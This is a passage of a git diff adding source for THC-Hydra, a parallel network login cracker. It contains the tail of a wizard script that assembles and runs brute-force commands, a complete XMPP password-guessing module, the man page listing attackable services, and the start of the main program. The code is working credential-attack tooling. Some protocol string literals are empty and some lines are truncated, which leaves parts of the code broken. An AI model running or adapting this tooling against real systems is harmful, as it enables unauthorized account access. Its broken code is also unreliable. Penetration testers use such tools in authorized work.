; } +read -p "If you want to test for passwords (s)ame as login, (n)ull or (r)everse login, enter these letters without spaces (e.g. \"sr\") or leave empty otherwise: " pw +read -p "Port number (press enter for default): " port +echo +echo The following options are supported by the service module: +hydra -U $service +echo +read -p "If you want to add module options, enter them here (or leave empty): " opt +echo + +ports="" +pws="" +opts="" +test -e "$target" && targets="-M $target" +test -e "$target" || targets="$target" +test -e "$user" && users="-L $user" +test -e "$user" || users="-l $user" +test -e "$pass" && passs="-P $pass" +test -e "$pass" || passs="-p $pass" +test -n "$port" && ports="-s $port" +test -n "$pw" && pws="-e $pw" +test -n "$opt" && opts="-m '$opt'" + +echo The following command will be executed now: +echo " hydra $users $passs -u $pws $ports $opts $targets $service" +echo +read -p "Do you want to run the command now? [Y/n] " yn +test "$yn" = "n" -o "$yn" = "N" && { echo Exiting. ; exit 0 ; } +echo +hydra $users $passs -u $pws $ports $opts $targets $service diff --git a/hydra-xmpp.c b/hydra-xmpp.c new file mode 100644 index 0000000..6c26148 --- /dev/null +++ b/hydra-xmpp.c @@ -0,0 +1,494 @@ +#include "hydra-mod.h" +#include "sasl.h" + +/* david: ref http://xmpp.org/rfcs/rfc3920.html */ + +extern char *HYDRA_EXIT; +char *buf; +static char *domain = NULL; + +int xmpp_auth_mechanism = AUTH_ERROR; + +char *JABBER_CLIENT_INIT_STR = ""; + +int start_xmpp(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = "\"\""; + char *login, *pass, buffer[500], buffer2[500]; + char *AUTH_STR = ""; + char *CHALLENGE_STR = ""; + char *CHALLENGE_STR2 = ""; + char *CHALLENGE_END_STR = ""; + char *RESPONSE_STR = ""; + char *RESPONSE_END_STR = ""; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + switch (xmpp_auth_mechanism) { + case AUTH_SCRAMSHA1: + sprintf(buffer, "%s%s%s", AUTH_STR, "SCRAM-SHA-1", AUTH_STR_END); + break; + case AUTH_CRAMMD5: + sprintf(buffer, "%s%s%s", AUTH_STR, "CRAM-MD5", AUTH_STR_END); + break; + case AUTH_DIGESTMD5: + sprintf(buffer, "%s%s%s", AUTH_STR, "DIGEST-MD5", AUTH_STR_END); + break; + case AUTH_PLAIN: + sprintf(buffer, "%s%s%s", AUTH_STR, "PLAIN", AUTH_STR_END); + break; + default: + sprintf(buffer, "%s%s%s", AUTH_STR, "LOGIN", AUTH_STR_END); + break; + } + + hydra_send(s, buffer, strlen(buffer), 0); + usleep(300000); + buf = hydra_receive_line(s); + + if (verbose) + hydra_report(stderr, "DEBUG S: %s\n", buf); + + if ((strstr(buf, CHALLENGE_STR) != NULL) || (strstr(buf, CHALLENGE_STR2) != NULL)) { + /* + the challenge string is sent depending of the + auth chosen it's the case for login auth + */ + + char *ptr = strstr(buf, CHALLENGE_STR); + + if (!ptr) + ptr = strstr(buf, CHALLENGE_STR2); + char *ptr_end = strstr(ptr, CHALLENGE_END_STR); + int chglen = ptr_end - ptr - strlen(CHALLENGE_STR); + + if ((chglen > 0) && (chglen < sizeof(buffer2))) { + strncpy(buffer2, ptr + strlen(CHALLENGE_STR), chglen); + buffer2[chglen] = '\0'; + memset(buffer, 0, sizeof(buffer)); + from64tobits((char *) buffer, buffer2); + if (verbose) + hydra_report(stderr, "DEBUG S: %s\n", buffer); + } + + switch (xmpp_auth_mechanism) { + case AUTH_LOGIN:{ + if (strstr(buffer, "sername") != NULL) { + strncpy(buffer2, login, sizeof(buffer2) - 1); + buffer2[sizeof(buffer2) - 1] = '\0'; + + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + sprintf(buffer, "%s%.250s%s", RESPONSE_STR, buffer2, RESPONSE_END_STR); + if (verbose) + hydra_report(stderr, "DEBUG C: %s\n", buffer); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + free(buf); + return 1; + } + buf = hydra_receive_line(s); + if (buf == NULL) + return 1; + /* server now would ask for the password */ + if ((strstr(buf, CHALLENGE_STR) != NULL) || (strstr(buf, CHALLENGE_STR2) != NULL)) { + char *ptr = strstr(buf, CHALLENGE_STR); + + if (!ptr) + ptr = strstr(buf, CHALLENGE_STR2); + char *ptr_end = strstr(ptr, CHALLENGE_END_STR); + int chglen = ptr_end - ptr - strlen(CHALLENGE_STR); + + if ((chglen > 0) && (chglen < sizeof(buffer2))) { + strncpy(buffer2, ptr + strlen(CHALLENGE_STR), chglen); + buffer2[chglen] = '\0'; + memset(buffer, 0, sizeof(buffer)); + from64tobits((char *) buffer, buffer2); + if (strstr(buffer, "assword") != NULL) { + strncpy(buffer2, pass, sizeof(buffer2) - 1); + buffer2[sizeof(buffer2) - 1] = '\0'; + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + sprintf(buffer, "%s%.250s%s", RESPONSE_STR, buffer2, RESPONSE_END_STR); + } + } else { + hydra_report(stderr, "[ERROR] xmpp could not extract challenge from server\n"); + free(buf); + return 1; + } + free(buf); + } + } + } + break; +#ifdef LIBOPENSSL + case AUTH_PLAIN:{ + memset(buffer2, 0, sizeof(buffer)); + sasl_plain(buffer2, login, pass); + sprintf(buffer, "%s%.250s%s", RESPONSE_STR, buffer2, RESPONSE_END_STR); + if (verbose) + hydra_report(stderr, "DEBUG C: %s\n", buffer); + + } + break; + case AUTH_CRAMMD5:{ + int rc = 0; + char *preplogin; + + memset(buffer2, 0, sizeof(buffer2)); + sasl_cram_md5(buffer2, pass, buffer); + + rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin); + if (rc) { + return 3; + } + + sprintf(buffer, "%.200s %.250s", preplogin, buffer2); + if (verbose) + hydra_report(stderr, "DEBUG C: %s\n", buffer); + hydra_tobase64((unsigned char *) buffer, strlen(buffer), sizeof(buffer)); + sprintf(buffer2, "%s%.250s%s", RESPONSE_STR, buffer, RESPONSE_END_STR); + strncpy(buffer, buffer2, sizeof(buffer) - 1); + buffer[sizeof(buffer) - 1] = '\0'; + free(preplogin); + } + break; + case AUTH_DIGESTMD5:{ + memset(buffer2, 0, sizeof(buffer2)); + sasl_digest_md5(buffer2, login, pass, buffer, domain, "xmpp", NULL, 0, NULL); + if (buffer2 == NULL) + return 3; + if (verbose) + hydra_report(stderr, "DEBUG C: %s\n", buffer2); + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + snprintf(buffer, sizeof(buffer), "%s%s%s", RESPONSE_STR, buffer2, RESPONSE_END_STR); + } + break; + case AUTH_SCRAMSHA1:{ + /*client-first-message */ + char clientfirstmessagebare[200]; + char *preplogin; + int rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin); + + if (rc) { + return 3; + } + + snprintf(clientfirstmessagebare, sizeof(clientfirstmessagebare), "n=%s,r=hydra", preplogin); + free(preplogin); + sprintf(buffer2, "n,,%.200s", clientfirstmessagebare); + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + snprintf(buffer, sizeof(buffer), "%s%s%s", RESPONSE_STR, buffer2, RESPONSE_END_STR); + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + buf = hydra_receive_line(s); + if (buf == NULL) + return 1; + + if ((strstr(buf, CHALLENGE_STR) != NULL) || (strstr(buf, CHALLENGE_STR2) != NULL)) { + char serverfirstmessage[200]; + char *ptr = strstr(buf, CHALLENGE_STR); + + if (!ptr) + ptr = strstr(buf, CHALLENGE_STR2); + char *ptr_end = strstr(ptr, CHALLENGE_END_STR); + int chglen = ptr_end - ptr - strlen(CHALLENGE_STR); + + if ((chglen > 0) && (chglen < sizeof(buffer2))) { + strncpy(buffer2, ptr + strlen(CHALLENGE_STR), chglen); + buffer2[chglen] = '\0'; + } else { + hydra_report(stderr, "[ERROR] xmpp could not extract challenge from server\n"); + free(buf); + return 1; + } + + /*server-first-message */ + memset(buffer, 0, sizeof(buffer)); + from64tobits((char *) buffer, buffer2); + strncpy(serverfirstmessage, buffer, sizeof(serverfirstmessage) - 1); + serverfirstmessage[sizeof(serverfirstmessage) - 1] = '\0'; + + memset(buffer2, 0, sizeof(buffer2)); + sasl_scram_sha1(buffer2, pass, clientfirstmessagebare, serverfirstmessage); + if (buffer2 == NULL) { + hydra_report(stderr, "[ERROR] Can't compute client response\n"); + free(buf); + return 1; + } + hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2)); + snprintf(buffer, sizeof(buffer), "%s%s%s", RESPONSE_STR, buffer2, RESPONSE_END_STR); + } else { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Not a valid server challenge\n"); + free(buf); + return 1; + } + free(buf); + } + break; +#endif + } + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 1; + } + usleep(50000); + buf = hydra_receive_line(s); + if (buf == NULL) + return 1; + + //we test the challenge tag as digest-md5 when connected is sending "rspauth" value + //so if we are receiving a second challenge we assume the auth is good + + if ((strstr(buf, "= 0) + sock = hydra_disconnect(sock); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + memset(buffer, 0, sizeof(buffer)); + snprintf(buffer, sizeof(buffer), "%s%s%s", JABBER_CLIENT_INIT_STR, domain, JABBER_CLIENT_INIT_END_STR); + if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) { + hydra_child_exit(1); + } + //some server is longer to answer + usleep(300000); + buf = hydra_receive_line(sock); + + if (buf == NULL) + hydra_child_exit(1); + + if (strstr(buf, "SCRAM-SHA-1") != NULL) { + xmpp_auth_mechanism = AUTH_SCRAMSHA1; + } + if (strstr(buf, "CRAM-MD5") != NULL) { + xmpp_auth_mechanism = AUTH_CRAMMD5; + } + if (strstr(buf, "DIGEST-MD5") != NULL) { + xmpp_auth_mechanism = AUTH_DIGESTMD5; + } + if (strstr(buf, "PLAIN") != NULL) { + xmpp_auth_mechanism = AUTH_PLAIN; + } + if (strstr(buf, "LOGIN") != NULL) { + xmpp_auth_mechanism = AUTH_LOGIN; + } + } + if (xmpp_auth_mechanism == AUTH_ERROR) { + /* no auth method identified */ + hydra_report(stderr, "[ERROR] no authentication methods can be identified %s\n", buf); + free(buf); + hydra_child_exit(1); + } + free(buf); + + if ((miscptr != NULL) && (strlen(miscptr) > 0)) { + int i; + + for (i = 0; i < strlen(miscptr); i++) + miscptr[i] = (char) toupper((int) miscptr[i]); + + if (strncmp(miscptr, "LOGIN", 5) == 0) + xmpp_auth_mechanism = AUTH_LOGIN; + + if (strncmp(miscptr, "PLAIN", 5) == 0) + xmpp_auth_mechanism = AUTH_PLAIN; + +#ifdef LIBOPENSSL + if (strncmp(miscptr, "CRAM-MD5", 8) == 0) + xmpp_auth_mechanism = AUTH_CRAMMD5; + + if (strncmp(miscptr, "SCRAM-SHA1", 10) == 0) + xmpp_auth_mechanism = AUTH_SCRAMSHA1; + + if (strncmp(miscptr, "DIGEST-MD5", 10) == 0) + xmpp_auth_mechanism = AUTH_DIGESTMD5; +#endif + } + + if (verbose) { + switch (xmpp_auth_mechanism) { + case AUTH_LOGIN: + hydra_report(stderr, "[VERBOSE] using XMPP LOGIN AUTH mechanism\n"); + break; + case AUTH_PLAIN: + hydra_report(stderr, "[VERBOSE] using XMPP PLAIN AUTH mechanism\n"); + break; +#ifdef LIBOPENSSL + case AUTH_CRAMMD5: + hydra_report(stderr, "[VERBOSE] using XMPP CRAM-MD5 AUTH mechanism\n"); + break; + case AUTH_SCRAMSHA1: + hydra_report(stderr, "[VERBOSE] using XMPP SCRAM-SHA1 AUTH mechanism\n"); + break; + case AUTH_DIGESTMD5: + hydra_report(stderr, "[VERBOSE] using XMPP DIGEST-MD5 AUTH mechanism\n"); + break; +#endif + } + } +#ifdef LIBOPENSSL + //check if tls is not wanted and if tls is available + if (!disable_tls && tls) { + char *STARTTLS = ""; + + hydra_send(sock, STARTTLS, strlen(STARTTLS), 0); + usleep(300000); + buf = hydra_receive_line(sock); + + if (buf == NULL || strstr(buf, "= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(2); + } + run = next_run; + } +} + +int service_xmpp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra.1 b/hydra.1 new file mode 100644 index 0000000..fc0bc1e --- /dev/null +++ b/hydra.1 @@ -0,0 +1,120 @@ +.TH "HYDRA" "1" "24/05/2012" +.SH NAME +hydra \- a very fast network logon cracker which support many different services +.SH SYNOPSIS +.B hydra + [[[\-l LOGIN|\-L FILE] [\-p PASS|\-P FILE|\-x OPT]] | [\-C FILE]] [\-e nsr] + [\-u] [\-f] [\-F] [\-M FILE] [\-o FILE] [\-t TASKS] [\-w TIME] [\-W TIME] + [\-s PORT] [\-S] [\-4/6] [\-vV] [\-d] + server service [OPTIONAL_SERVICE_PARAMETER] +.br +.SH DESCRIPTION +Hydra is a parallized login cracker which supports numerous protocols +to attack. New modules are easy to add, beside that, it is flexible and +very fast. + +This tool gives researchers and security consultants the possiblity to +show how easy it would be to gain unauthorized access from remote to a +system. + +Currently this tool supports: + AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, FTPS, + HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, + HTTP-PROXY-URLENUM, ICQ, IMAP, IRC, LDAP2, LDAP3, MS-SQL, MYSQL, NCP, NNTP, + Oracle, Oracle-Listener, Oracle-SID, PC-Anywhere, PCNFS, POP3, POSTGRES, + RDP, REXEC, RLOGIN, RSH, SAP/R3, SIP, SMB, SMTP, SMTP-Enum, SNMP, + SOCKS5, SSH(v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, + VMware-Auth, VNC and XMPP. + For most protocols, SSL mode is available (e.g. https-get, ftp-ssl, etc.) + If not all necessary libraries are found during compile time, your + available services will be less. Type "hydra" to see what is available. +.SH Options +.TP +.B target +a target to attack, can be an IPv4 address, IPv6 address or DNS name. +.TP +.B service +a service to attack, see the list of protocols available +.TP +.B OPTIONAL SERVICE PARAMETER +Some modules have optional or mandatory options. type "hydra \-U " + to get help on on the options of a service. +.TP +.B \-R +restore a previously aborted session. Requires a hydra.restore file was +written. No other options are allowed when using \-R +.TP +.B \-S +connect via SSL +.TP +.B \-s PORT +if the service is on a different default port, define it here +.TP +.B \-l LOGIN +or \-L FILE login with LOGIN name, or load several logins from FILE +.TP +.B \-p PASS +or \-P FILE try password PASS, or load several passwords from FILE +.TP +.B \-x min:max:charset +generate passwords from min to max length. charset can contain 1 + for numbers, a for lowcase and A for upcase characters. + Any other character is added is put to the list. + Example: 1:2:a1%. + The generated passwords will be of length 1 to 2 and contain + lowcase letters, numbers and/or percent signs and dots. +.TP +.B \-e nsr +additional checks, "n" for null password, "s" try login as pass, "r" try the reverse login as pass +.TP +.B \-C FILE +colon separated "login:pass" format, instead of \-L/\-P options +.TP +.B \-u +by default Hydra checks all passwords for one login and then tries the next +login. This option loops around the passwords, so the first password is +tried on all logins, then the next password. +.TP +.B \-f +exit after the first found login/password pair (per host if \-M) +.TP +.B \-F +exit after the first found login/password pair for any host (for usage with -M) +.TP +.B \-M FILE +server list for parallel attacks, one entry per line +.TP +.B \-o FILE +write found login/password pairs to FILE instead of stdout +.TP +.B \-t TASKS +run TASKS number of connects in parallel (default: 16) +.TP +.B \-w TIME +defines the max wait time in seconds for responses (default: 32) +.TP +.B \-W TIME +defines a wait time between each connection a task performs. This usually +only makes sense if a low task number is used, .e.g \-t 1 +.TP +.B \-4 / \-6 +prefer IPv4 (default) or IPv6 addresses +.TP +.B \-v / \-V +verbose mode / show login+pass combination for each attempt +.B \-d +debug mode +.TP +.B \-h, \-\-help +Show summary of options. +.SH SEE ALSO +.BR xhydra (1), +.BR pw-inspector (1). +.br +The programs are documented fully by van Hauser +.SH AUTHOR +hydra was written by van Hauser / THC and is co-maintained by David Maciejak . + +.PP +This manual page was written by Daniel Echeverry , +for the Debian project (and may be used by others). diff --git a/hydra.c b/hydra.c new file mode 100644 index 0000000..1936196 --- /dev/null +++ b/hydra.c @@ -0,0 +1,3700 @@ +/* + * hydra (c) 2001-2014 by van Hauser / THC + * http://www.thc.org + * + * Parallized network login hacker. + * Don't use in military or secret service organizations, or for illegal purposes. + * + * License: GNU AFFERO GENERAL PUBLIC LICENSE v3.0, see LICENSE file + */ + +#include "hydra.h" +#include "bfg.h" + +extern void service_asterisk(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_telnet(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_ftp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_ftps(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_pop3(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_vmauthd(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_imap(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_ldap2(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_ldap3(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_ldap3_cram_md5(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_ldap3_digest_md5(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_cisco(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_cisco_enable(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_vnc(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_socks5(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_rexec(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_rlogin(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_rsh(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_nntp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_http_head(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_http_get(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_http_get_form(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_http_post_form(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_icq(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_pcnfs(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_mssql(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_cvs(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_snmp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_smtp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_smtp_enum(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_teamspeak(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_pcanywhere(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_http_proxy(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_xmpp(char *target, char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_irc(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_http_proxy_urlenum(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_s7_300(char *ip, int sp, unsigned char options, char *miscptr, FILE *fp, int port); +// ADD NEW SERVICES HERE + +#ifdef HAVE_MATH_H +extern void service_mysql(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_mysql_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +#endif +#ifdef LIBPOSTGRES +extern void service_postgres(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_postgres_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +#endif +#ifdef LIBOPENSSL +extern void service_smb(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_smb_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_oracle_listener(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_oracle_listener_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_oracle_sid(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_oracle_sid_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_sip(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_sip_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_rdp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_rdp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +#endif +#ifdef LIBSAPR3 +extern void service_sapr3(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_sapr3_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +#endif +#ifdef LIBFIREBIRD +extern void service_firebird(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_firebird_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +#endif +#ifdef LIBAFP +extern void service_afp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_afp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +#endif +#ifdef LIBNCP +extern void service_ncp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_ncp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +#endif +#ifdef LIBSSH +extern void service_ssh(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_ssh_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern void service_sshkey(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_sshkey_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +#endif +#ifdef LIBSVN +extern void service_svn(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_svn_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +#endif +#ifdef LIBORACLE +extern void service_oracle(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_oracle_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +#endif + +extern int service_cisco_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_cisco_enable_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_cvs_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_smtp_enum_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_http_form_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_ftp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_http_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_icq_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_imap_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_irc_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_ldap_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_mssql_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_nntp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_pcanywhere_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_pcnfs_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_pop3_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_http_proxy_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_asterisk_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_redis_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_rexec_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_rlogin_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_rsh_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_smtp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_snmp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_socks5_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_teamspeak_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_telnet_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_http_proxy_urlenum_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_vmauthd_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_vnc_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_xmpp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); +extern int service_s7_300_init(char *ip, int sp, unsigned char options, char *miscptr, FILE *fp, int port); +// ADD NEW SERVICES HERE + + +// ADD NEW SERVICES HERE +char *SERVICES = "asterisk afp cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql ncp nntp oracle oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh s7-300 sapr3 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp"; + +#define MAXBUF 520 +#define MAXLINESIZE ( ( MAXBUF / 2 ) - 4 ) +#define MAXTASKS 64 +#define MAXSERVERS 16 +#define MAXFAIL 3 +#define MAXENDWAIT 20 +#define WAITTIME 32 +#define TASKS 16 +#define SKIPLOGIN 256 +#define USLEEP_LOOP 10 +#define MAX_LINES 50000000 // 50 millions, do not put more than 65millions +#define MAX_BYTES 500000000 // 500 millions, do not put more than 650millions + +#define RESTOREFILE "./hydra.restore" + +#define PROGRAM "Hydra" +#define VERSION "v7.7" +#define AUTHOR "van Hauser/THC" +#define EMAIL "" +#define AUTHOR2 "David Maciejak" +#define EMAIL2 "" +#define RESOURCE "http://www.thc.org/thc-hydra" + +extern char *hydra_strcasestr(const char *haystack, const char *needle); +extern void hydra_tobase64(unsigned char *buf, int buflen, int bufsize); +extern char *hydra_string_replace(const char *string, const char *substr, const char *replacement); +extern char *hydra_address2string(char *address); +extern int colored_output; + +void hydra_kill_head(int head_no, int killit, int fail); + +// some structure definitions +typedef struct { + pid_t pid; + int sp[2]; + int target_no; + char *current_login_ptr; + char *current_pass_ptr; + char reverse[256]; + int active; + int redo; + time_t last_seen; +} hydra_head; + +typedef struct { + char *target; + char ip[36]; + char *login_ptr; + char *pass_ptr; + unsigned long int login_no; + unsigned long int pass_no; + unsigned long int sent; + int pass_state; + int use_count; + int done; // 0 if active, 1 if finished scanning, 2 if error (for RESTOREFILE), 3 could not be resolved + int fail_count; + int redo_state; + int redo; + int ok; + int failed; + int skipcnt; + char *redo_login[MAXTASKS * 2 + 2]; + char *redo_pass[MAXTASKS * 2 + 2]; + char *skiplogin[SKIPLOGIN]; +// char *bfg_ptr[MAXTASKS]; +} hydra_target; + +typedef struct { + int active; // active tasks of hydra_options.max_use + int targets; + int finished; + int exit; + unsigned long int todo_all; + unsigned long int todo; + unsigned long int sent; + unsigned long int found; + unsigned long int countlogin; + unsigned long int countpass; + size_t sizelogin; + size_t sizepass; + FILE *ofp; +} hydra_brain; + +typedef struct { + int mode; // valid modes: 0 = -l -p, 1 = -l -P, 2 = -L -p, 3 = -L -P, 4 = -l -x, 6 = -L -x, +8 if -e r, +16 if -e n, +32 if -e s, 64 = -C | bit 128 undefined + int loop_mode; // valid modes: 0 = password, 1 = user + int ssl; + int restore; + int debug; // is external - for restore + int verbose; // is external - for restore + int showAttempt; + int tasks; + int try_null_password; + int try_password_same_as_login; + int try_password_reverse_login; + int exit_found; + int max_use; + char *login; + char *loginfile; + char *pass; + char *passfile; + char *outfile_ptr; + char *infile_ptr; + char *colonfile; + int waittime; // is external - for restore + int conwait; // is external - for restore + unsigned int port; // is external - for restore + char *miscptr; + char *server; + char *service; + char bfg; +} hydra_option; + +typedef struct { + char *name; + int port; + int port_ssl; +} hydra_portlist; + +// external vars +extern char HYDRA_EXIT[5]; +extern int errno; +extern int debug; +extern int verbose; +extern int waittime; +extern int port; +extern int found; +extern int use_proxy; +extern int proxy_string_port; +extern char proxy_string_ip[36]; +extern char proxy_string_type[10]; +extern char *proxy_authentication; 